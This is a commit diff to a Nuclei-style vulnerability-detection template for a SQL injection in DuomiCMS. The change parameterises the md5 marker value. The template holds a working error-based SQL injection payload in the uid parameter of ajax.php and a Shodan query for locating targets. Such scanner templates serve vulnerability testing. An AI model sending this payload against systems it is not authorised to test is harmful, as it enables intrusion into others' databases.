Update duomicms-sql-injection.yaml

patch-1
Ritik Chaddha 2022-06-30 08:18:22 +05:30 committed by GitHub
parent a5e29b684a
commit 8ab77083cc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 2 deletions

View File

@ -10,17 +10,20 @@ info:
verified: true
shodan-query: title:"DuomiCMS"
tags: duomicms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))"
- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))"
matchers-condition: and
matchers:
- type: word
words:
- '{{md5(9999999999)}}'
- '{{md5({{num}})}}'
- type: status
status: